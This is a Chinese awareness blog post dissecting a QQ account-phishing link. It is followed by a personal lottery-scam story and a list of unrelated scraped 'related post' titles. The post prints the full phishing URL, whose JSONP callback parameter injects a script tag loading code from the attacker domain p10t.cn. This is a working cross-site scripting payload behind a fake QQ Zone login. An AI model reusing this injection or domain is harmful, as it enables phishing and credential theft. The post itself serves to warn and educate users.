前言

相信大家在懵懂无知的时候都有被盗号的经历吧,QQ胡乱的加好友,突然有个好友传了个文件给你,打开以后发现QQ竟然显示强制下线,然后再也上不去了QAQ,很明显,QQ号被人盗了。最近也是很多小伙伴私信我,也看了一些人发空间说QQ号被盗了啥的,以及我自己收到的一些诈骗请求。网上针对防骗这块的文章几乎没有,为了不让更多的人受害,下面我将会以最真实朴素的语言介绍最常见的一种盗号诈骗方式,浅析一下这个盗号原理的全过程~~~希望大家不要再上当受骗啦~!

正文

下面我给大家介绍一种最常见的QQ诈骗方式。

这个是我今早收到的一条链接,相信不少朋友肯定也收到类似的链接吧,甚至乎很多人都说因为点开这个链接被盗号吧。。。只有不懂安全,没用安全意识的人才会这么说吧!!!

让我带大家来剖析一下这个东东吧~~~

很明显,你看这个域名看不出任何眉头,既然大家都不敢点,我就替大家点点看~~~

首先我们在手机端点开这个链接

点开一看,我们可以看到,是一个QQ空间登录界面,这个界面就是一个欺骗用户的界面,为什么这么说呢,你把这个界面链接复制出来,用浏览器打开,你会发现网页无法打开,并且域名成了下面这个:

http://sdk.h5.gamedog.cn/apih5v2/getIsLogin/?callback=%00%00%00%00%00%00%00%3CscripT/src%3D//p10t.cn/app.php%3Faid%3D5%3E%3C/scripT%3E%3C!--&bqvoqvwqtujhigzkumjk.png

看样子域名被浏览器解析成了一张png图片,你可能会有点好奇这个,我们用pc端按照这个地址进行追踪,用F12查看网页源代码

<scripT/src=//p10t.cn/app.php?aid=5></scripT><!--({"code":-2,"msg":"\u7528\u6237\u672a\u767b\u5f55"})

就只有这么一行,我们可以看到从登录页面输入完账号密码以后会跳转到一个app.php网页里面,我们循规蹈矩,直接去追踪访问那个界面

有点意思,网页从QQ空间进行跳转的

window.location.href = "http://qzone.qq.com";

学过JavaScript的朋友应该知道,location.href="网站链接",表示重新定向到新页面,同时刷新打开的这个页面;

这个意思是从一个伪QQ空间的页面上输入账户密码,这个页面被植入了php的恶意木马,通过跳转重定向,直接跳转到了木马网站去了,后台数据库并记录了这条信息,然后你的QQ号账户密码就被别人成功获取了~~~

如果不信的话,我们可以一起来试一试

首先输入账号密码。。。我们就随便伪造一个,账号是3838438,密码就写一个mmpsbsbsb试试看!!!

这里还要说一点,我试的时候这里好像做的还挺真实的,防中文输入,我本来想直接开口大骂呢,hhhh,没给我这个机会。。。

这里无论输入什么账号密码都可以过,除了中文无法检测,账号必须是一连串的数字,密码防了中文输入。

然后我点击登录

看吧,直接就登录成功了,还有这张图片,这这这。。。完全就是挑衅啊,竟然贴一张小狗的图片,是在考验我智商嘛?

我尝试了一下ping它的主页,ping p10t.cn

ping通了,说明这个网站还活着。

但是登录页面显示403错误,服务器拒绝访问,我不是很清楚如何绕过这一防线。

那我也没辙了,技术不够精湛,我只能写下这篇文章记录一下,希望更多的人看到,不要再上当受骗了就好~~~

如果文章哪里写的有出路的地方,希望各位不吝赐教,如果有更好的解决方案,欢迎在评论区留言或私信给我,感谢大家的支持~~~

关于其他类型的诈骗

可能有些人遇到一些其他的诈骗,比如电话诈骗,短信诈骗,讲一个最真实的例子,推荐你们看一部电影,叫嘉年华,里面讲述的是关于电信诈骗的案件,这部电影是由真实事件改编而成的,非常推荐大家观看,里面有一些防诈骗的技巧,看完以后你会对常见的诈骗手段有了一个更深层次的了解。

如果没有找到资源的小伙伴,我也会在文章中分享给你们一个百度云链接,保存以后下载观看即可:链接:https://pan.baidu.com/s/1CrYJ9jtkSqqxzZSlzQTsqA 密码:2qlz

说这么多,可能大家会认为我在吹牛皮,认为这些事情不会发生在自己身上。我讲一个最真实的例子,我母亲因为前段时间地上见到一张彩票,刮开奖说中了10w块钱,我身在一个并不宽裕的家庭,按照现在的话来讲,算是贫农家庭,还远没达到小康水平,想想看,10w块钱从天而降,对于我们这种家庭,这绝对算是一笔相当的财富,当时我妈拿着彩票回家,和我还有我爸商量来着,我一看说,这肯定是骗局吧,这么好的事情为什么偏偏出现在我们身上,天上不会掉馅饼,努力奋斗才能梦想成真,我妈偏不信这个邪,想去试一试,然后拨打了上面的电话,上面巴拉巴拉说了一大堆,意思就是要交3000块钱税钱啥的,然后才能兑换这个钱,你看,这不明显是骗局嘛,我妈又觉得,如果得到了这个钱,相当于她少上多少年的班,其实说白了这一切都是为了这个不争气的我,我其实也是很愧疚的。所以朋友们要记住,只要谈到钱这个问题,要悠着点,十有八九都是骗局,我妈最后是按照地址打钱过去了,然后事实上,对方并没有想要兑换的意思,巴拉巴拉说了一大堆,好像又是要交钱。。。我妈现在才意识到被骗了,然后跑到警局报了案,警方说,你不是第一个了,关于彩票中奖被骗的人一大堆,他们说没有足够的证据线索,立不了案,没办法了,3k被狗吃了,这可是辛辛苦苦东奔西跑的血汗钱,这些骗子也是一点良心都没有,所以。。。后来我励志要当一名网警,要把这些逍遥法外的人绳之以法,天网恢恢疏而不漏,这些人最终一定逃不了法律的制裁的。

后记

关于盗号这一问题,我给大家提醒两句,只要少一点好奇心,少一点贪欲,多一点警惕之心,不管是什么类型的诈骗都不会出现在你身上,谨记哦。。。

转载于:https://www.cnblogs.com/ECJTUACM-873284962/p/9249616.html

不要再被骗了------QQ盗号原理大揭秘相关推荐

  1. 诗人般的机器学习,ML工作原理大揭秘

    诗人般的机器学习,ML工作原理大揭秘 https://www.cnblogs.com/DicksonJYL/p/9698208.html 选自arXiv 作者:Cassie Kozyrkov 机器之心 ...

  2. php 108张牌洗牌,完美洗牌原理大揭秘 手把手图文教程!呕心沥血的超级干货...

    原标题:完美洗牌原理大揭秘 & 手把手图文教程!呕心沥血的超级干货 先感慨一下,昨晚写到半夜,今天又修改了很多遍,我终于把这篇文章写完了. 然后自夸一下,我敢保证,你从来没有看过像这样的完美洗 ...

  3. vooc充电原理_VOOC闪充原理大揭秘! OPPO为用户跟细节杠上了

    原标题:VOOC闪充原理大揭秘! OPPO为用户跟细节杠上了 身为充电领域的标杆,OPPO在2018年推出高达50W的超级闪充之后,在今年又在快充技术上拿出了新技术,OPPO Reno系列新机全面搭载 ...

  4. 360扫地机原理大揭秘,竟还有无人驾驶技术?——浅析家用机器人SLAM方案

    女主宣言 2018年年初,360推出了扫地机器人.这款机器人应用了SLAM技术.SLAM技术可以对未知环境自动建立地图,并为智能设备导航.这一技术广泛地应用于各种可移动的智能设备.不论是自动驾驶汽车. ...

  5. 双摄测距原理_“双摄”火遍天 工作原理大揭秘

    OFweek电子工程网讯 手机拍照自功能机时代就已经成为人们日常经常使用的一个功能,自进入智能机以来地位更是被不断的拔高.注意力所在之地往往就是创新的迸发处,这一点在手机拍照上再恰当不过,无数的技术越 ...

  6. 注解不自动导包_玩转SpringBoot2.X:SpringBoot自动配置原理大揭秘

    我们在使用SpringBoot的时候,是不是觉得特方便,根本不需要我们去配置什么端口号,应用名称,又比如我们再整合redis的时候,其实也不需要我们去指定端口号,IP,都会有默认的.是不是特方便.那么 ...

  7. 轻轻一扫立刻扣款,付款码技术原理大揭秘 | 原力计划

    作者 | 楼下小黑哥 责编 | 王晓曼 出品 | CSDN博客 前言 最近由于业务需求,需要开发付款码功能,该接口底层将会聚合市面上主流钱包 APP 的付款码功能,如微信支付,支付宝支付. ps:付款 ...

  8. 电子警察原理大揭秘 注意!不被电子警察拍照的秘密(图解)

    要想不再被电子警察拍照,先要搞清楚电子警察的类型和工作原理.简单来说,一般分五种: 1.在各个市区红绿灯路口安装的闯红灯电子警察,它主要对闯红灯和越过中心黄线的车辆进行拍摄 2.在公路上安装的公路智能 ...

  9. AI能让杨超越跳舞?背后原理大揭秘!

    上个月杨超越编程大赛在github上大火了一段时间,不过随着时间失衡其热度慢慢下降了,不过而该赛事的31号作品<YCY Dance Now>横空出世,能够做到让用户给定一段跳舞的源视频并上 ...

  10. catia怎么测总成重量_CATIA总成批量改名原理大揭秘

    这个时候,我们要引入一个概念,叫做递归,简单来说就是程序调用自身的过程. 如果还想不明白,诸位可以回忆一下你们昨晚看的那些小姐姐的直播:当她们***此处省略若干字***,然后中场休息时,在自己的桌面上 ...

最新文章

  1. 不管走多远,不要忘记停下来想想当初为何出发
  2. mongodb php 支持
  3. 面试后说hold什么意思_民间说的命硬是什么意思?
  4. mariadb 没有mysql表_数据未插入mySQL表(MariaDB)
  5. Prometheus 系统监控方案
  6. React开发(269):事件的绑定-addEventListener
  7. (计算机组成原理)第二章数据的表示和运算-第四节2:本节习题
  8. WMI服务故障,VBS脚本无法运行错误
  9. Python中的for循环,while循环
  10. 提升站点SEO的7个建议
  11. WA5320-C-EI无线接入点,WX2510H-F无线控制器设置WAPI
  12. 计算机网络期末总结复习(全)
  13. 高分三号卫星相关知识
  14. Eat Pray Love!
  15. Java对List集合中的对象的某个中文字段按照拼音首字母进行排序
  16. 华为这次是给所有企业挡了子弹
  17. 高效能人士的七个习惯--读后感
  18. python 自动化微信小程序_干货 | 微信小程序自动化测试最佳实践(附 Python 源码)...
  19. 友盟APM和bugly全面对比
  20. 【人工智能】人工智能发展简史 | 复习笔记

热门文章

  1. word2016 脚注问题总结
  2. 给互联网创业公司的8个建议
  3. 海南计算机管理科员工资,海南公务员级别工资一览表
  4. Retrofit的封装
  5. 【JAVA】金额工具类 金额千分位、中文大写金额、英文金额
  6. 陈宁计算机辅助设计说课稿,《归去来兮辞》(并序)说课稿
  7. STM32L431 I2S/IIS slaver使用
  8. npm init vite@latest 报错
  9. 设计模式(创建型模式)-抽象工厂模式
  10. 学习zencart模板制作